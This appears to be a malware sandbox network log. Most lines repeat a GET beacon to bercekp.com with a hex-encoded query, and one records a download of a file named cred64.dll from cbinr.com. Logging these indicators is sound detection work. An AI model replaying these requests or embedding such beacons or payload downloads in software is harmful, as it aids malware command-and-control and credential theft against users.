                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /forum/Plugins/cred64.dll HTTP/1.1Host: cbinr.com
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
